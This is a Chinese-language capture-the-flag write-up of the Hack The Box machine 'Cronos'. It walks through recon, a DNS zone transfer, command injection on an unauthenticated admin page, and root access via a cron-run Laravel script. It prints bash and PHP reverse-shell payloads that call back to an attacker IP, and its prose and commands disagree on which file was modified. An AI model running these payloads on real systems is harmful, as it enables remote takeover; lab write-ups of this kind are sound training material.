Skip to content

Cronos Writeup

  • 241216: Added missing title to block, which was previously omitted due to oversight.

超級簡單,說難度是中等你敢信?

靶機資訊

Machine Description
Name Cronos
OS Linux
Difficulty Medium
Author ch4p

情蒐 Recon

服務掃描

PORT   STATE  SERVICE   VERSION
22/tcp open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open   domain    ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Cronos
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ sudo nmap -p- --min-rate 6969 10.129.239.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 21:02 EST
Nmap scan report for 10.129.239.126
Host is up (0.055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds

┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ sudo nmap -p22,53,80 -sCV 10.129.239.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 21:04 EST
Nmap scan report for 10.129.239.126
Host is up (0.058s latency).

PORT   STATE  SERVICE   VERSION
22/tcp open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open   domain    ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Cronos
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.87 seconds

掃完標的發現開啟三個port,分別是SSH、DNS和HTTP,有開DNS,待會可以玩看看。

HTTP - Port 80

在連線之前先看看header裡面有沒有透露靶機的域名。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ curl -sv -o /dev/null 10.129.239.126
*   Trying 10.129.239.126:80...
* Connected to 10.129.239.126 (10.129.239.126) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.129.239.126
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2024 02:10:05 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Fri, 01 Jan 2021 00:29:56 GMT
< ETag: "2caf-5b7cbd6fbb19d"
< Accept-Ranges: bytes
< Content-Length: 11439
< Vary: Accept-Encoding
< Content-Type: text/html
<
{ [11439 bytes data]
* Connection #0 to host 10.129.239.126 left intact

結果沒有,只得知和nmap掃描一樣的結果,網站是用apache架設的。

於是連線網頁,顯示了Ubuntu架設apache的預設頁面,基本上遇到這頁面代表者兩件事,不是網站設定錯誤, 就是我們沒有走對的route,所以apache不知道要把我們導向哪裡。

所以先找看看域名吧!

DNS - Port 53

在掃描的階段就已經發現DNS服務,於是嘗試使用dig -x反向解析(reverse lookups)。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ dig @10.129.239.126 -x 10.129.239.126

; <<>> DiG 9.20.2-1-Debian <<>> @10.129.239.126 -x 10.129.239.126
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17915
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;126.239.129.10.in-addr.arpa.   IN      PTR

;; ANSWER SECTION:
126.239.129.10.in-addr.arpa. 604800 IN  PTR     ns1.cronos.htb.

;; AUTHORITY SECTION:
129.10.in-addr.arpa.    604800  IN      NS      ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.         604800  IN      A       10.10.10.13

;; Query time: 56 msec
;; SERVER: 10.129.239.126#53(10.129.239.126) (UDP)
;; WHEN: Tue Nov 19 21:24:58 EST 2024
;; MSG SIZE  rcvd: 114

IP反向解析出域名是cronos.htb!除此之外,也可以嘗試「zone transfer (AXFR)」!

什麼是zone transfer?怎麼知道要利用zone transfer?

你不覺得剛剛nmap掃出DNS聽53/TCP很奇怪嗎?
一般來說,DNS query只需要聆聽53/UDP,在此就是為了zone transfer功能才開啟TCP, 不然UDP封包大小上限不夠傳輸資料,除非資料大小小於512 byte。
詳細可以參考這篇zone transfer的解釋,和AXRF的範例。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ dig axfr @10.129.239.126 cronos.htb

; <<>> DiG 9.20.2-1-Debian <<>> axfr @10.129.239.126 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 60 msec
;; SERVER: 10.129.239.126#53(10.129.239.126) (TCP)
;; WHEN: Tue Nov 19 21:17:04 EST 2024
;; XFR size: 7 records (messages 1, bytes 203

發現一個子網域admin,於是將它們加入到/etc/hosts中。

terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ echo "10.129.239.126 cronos.htb admin.cronos.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.129.239.126 cronos.htb admin.cronos.htb

cronos.htb

連往cronos.htb首頁,檢視頁面原始得知首頁中的連結全部連往 Laravel ,Laravel是一個很知名PHP的框架 ,由此推測後端技術採用PHP。

本階段其餘完成事項

沒有有意思的資訊。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ feroxbuster -u http://cronos.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://cronos.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       85l      137w     2319c http://cronos.htb/
404      GET        9l       33w      287c http://cronos.htb/Program%20Files
301      GET        9l       28w      306c http://cronos.htb/css => http://cronos.htb/css/
200      GET        9l     1270w   118393c http://cronos.htb/css/app.css
200      GET        0l        0w        0c http://cronos.htb/favicon.ico
200      GET       85l      137w     2319c http://cronos.htb/index.php
301      GET        9l       28w      305c http://cronos.htb/js => http://cronos.htb/js/
200      GET       41l     5569w   284534c http://cronos.htb/js/app.js
200      GET        2l        3w       24c http://cronos.htb/robots.txt
200      GET       23l       59w      914c http://cronos.htb/web.config
[####################] - 10s     4742/4742    0s      found:10      errors:0
[####################] - 9s      4735/4735    507/s   http://cronos.htb/
[####################] - 1s      4735/4735    9230/s  http://cronos.htb/css/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 1s      4735/4735    4735/s  http://cronos.htb/js/ => Directory listing (add --scan-dir-listings to scan)
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ curl -s http://cronos.htb/web.config
<configuration>
<system.webServer>
  <rewrite>
    <rules>
      <rule name="Imported Rule 1" stopProcessing="true">
        <match url="^(.*)/$" ignoreCase="false" />
        <conditions>
          <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
        </conditions>
        <action type="Redirect" redirectType="Permanent" url="/{R:1}" />
      </rule>
      <rule name="Imported Rule 2" stopProcessing="true">
        <match url="^" ignoreCase="false" />
        <conditions>
          <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
          <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" />
        </conditions>
        <action type="Rewrite" url="index.php" />
      </rule>
    </rules>
  </rewrite>
</system.webServer>
</configuration>

無效權限控管

admin.cronos.htb是一登入頁面,需要帳號密碼,但是暴力猜密碼沒有成功,於是就特別針對php檔案結尾暴力詳列目錄。

從掃描結果發現任意使用者可以在不登入的情況下取得welcome.php

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ feroxbuster -u http://admin.cronos.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -x php
...
302      GET        0l        0w        0c http://admin.cronos.htb/logout.php => index.php
200      GET       56l      139w     1547c http://admin.cronos.htb/
200      GET        0l        0w        0c http://admin.cronos.htb/config.php
200      GET       56l      139w     1547c http://admin.cronos.htb/index.php
302      GET       20l       38w      439c http://admin.cronos.htb/welcome.php => index.php
302      GET        0l        0w        0c http://admin.cronos.htb/session.php => index.php
404      GET        9l       33w      293c http://admin.cronos.htb/Style%20Library
404      GET        9l       33w      297c http://admin.cronos.htb/Style%20Library.php
404      GET        9l       33w      290c http://admin.cronos.htb/modern%20mom
404      GET        9l       34w      295c http://admin.cronos.htb/neuf%20giga%20photo
404      GET        9l       33w      294c http://admin.cronos.htb/modern%20mom.php
404      GET        9l       34w      299c http://admin.cronos.htb/neuf%20giga%20photo.php

admin站點沒有做好權限管理,導致只要知道admin.cronos.htb/welcom.php, 任何人都可以使用traceping的功能。
於是開啟Burp Suite,一邊側錄封包,一邊測試功能, 結果發現只有ping功能可以正常使用。

發現命令注入

擷取到的封包顯示welcome.php其實就只包含一個簡單傳送指令的功能。

command=<COMMAND>host=<IP>兩個參數可以任意更改,於是嘗試命令注入curl回連我方機器,結果web server確實GETrequest。

準備Reverse Shell的payload:

command=bash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.10.14.10%2f8787%200%3e%261%20%23'&host=8.8.8.8
Command Injection Payload解釋

將payload經過url decode後得到:

command=bash -c 'bash -i >& /dev/tcp/10.10.14.10/8787 0>&1 #'&host=8.8.8.8
其實就是很簡單的reverse shell指令,並在後方加上#註解掉後面的IP。

成功取得Reverse Shell!

意外發現www-data竟然有權限讀取noulis家目錄。

Terminal
www-data@cronos:/var/www/admin$ ls
ls
config.php
index.php
logout.php
session.php
welcome.php
www-data@cronos:/var/www/admin$ cat config.php
cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$ cd /home
cd /home
www-data@cronos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root   root   4.0K May 10  2022 .
drwxr-xr-x 23 root   root   4.0K May 10  2022 ..
drwxr-xr-x  4 noulis noulis 4.0K May 10  2022 noulis
www-data@cronos:/home$ ls noulis
ls noulis
user.txt
www-data@cronos:/home$ cat noulis/user.txt
cat noulis/user.txt
e37184fa832a858d65f55f9c0ff03205
本階段其餘完成事項

沒成功。

Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ ffuf -request-proto http -request login.req -w /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-100000.txt -fs 1585
...

POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://admin.cronos.htb
Connection: keep-alive
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=aoisqv2k4egh3llbkgvqgj13q1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&password=FUZZ

Crontab提權

靶機的名稱暗示太大了,外加www-data又有讀取/etc/crontab的權限,哈,不看看怎麼行?

Terminal
www-data@cronos:/$  cat /etc/crontab
 cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

果然寫了些什麼,顯示root每分鐘執行一次Laravelartisan schedule:run。 這代表著,如果我們能操縱artisan,或是被artisan帶起的服務,就能夠提權!

Terminal
www-data@cronos:/$ ls -alh /var/www/laravel/artisan
ls -alh /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1.7K Apr  9  2017 /var/www/laravel/artisan

首先檢查/var/www/laravel/artisan的讀取權限,結果可讀可寫,讀取內容發現artisan其實就是一份PHP檔, 現在理論上只要將PHP的reverse shell加入到該檔中,就可以等收root的reverse shell回彈, 但是目前的session是dumb shell,沒辦法直接使用互動式vim修改檔案,外加我想直接tee -a code進去, 所以先看看哪份檔案適合加code到最後一行。

你想要的話,可以用python把dumb shell變「聰明」。

artisan在最一開始引入兩份檔案:autoload.phpapp.php,並在最後exit($status), 所以直接加入code到artisan的最後面是不行的,因此看看其他兩份檔案。

www-data@cronos:/$ cat /var/www/laravel/artisan
cat /var/www/laravel/artisan
#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';
...
$kernel->terminate($input, $status);

exit($status);
www-data@cronos:/var/www/laravel$ cat bootstrap/*.php
cat bootstrap/*.php
<?php

...

$app->singleton(
    Illuminate\Contracts\Http\Kernel::class,
    App\Http\Kernel::class
);

$app->singleton(
    Illuminate\Contracts\Console\Kernel::class,
    App\Console\Kernel::class
);

$app->singleton(
    Illuminate\Contracts\Debug\ExceptionHandler::class,
    App\Exceptions\Handler::class
);
...
return $app;

不適合加code在最後,因為return

<?php

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Composer Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/../vendor/autoload.php';

最後加入payload至autoload.php中,就可以等回連。

'$sock=fsockopen("10.10.14.10",8788);exec("/bin/bash -i <&3 >&3 2>&3");'
Terminal
www-data@cronos:/var/www/laravel$ echo '$sock=fsockopen("10.10.14.10",8788);exec("/bin/sh -i <&3 >&3 2>&3");' | tee -a ./bootstrap/app.php
<c("/bin/sh -i <&3 >&3 2>&3");' | tee -a ./bootstrap/app.php
$sock=fsockopen("10.10.14.10",8788);exec("/bin/sh -i <&3 >&3 2>&3");
www-data@cronos:/var/www/laravel$ exit  
Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ nc -lvnp 8788
listening on [any] 8788 ...
connect to [10.10.14.10] from (UNKNOWN) [10.129.239.126] 47986
bash: cannot set terminal process group (10151): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:~# cat root.txt
cat root.txt
0e2da2d811079c6307c50a835b593f87

Last update: 2024-12-23 Created: 2024-11-27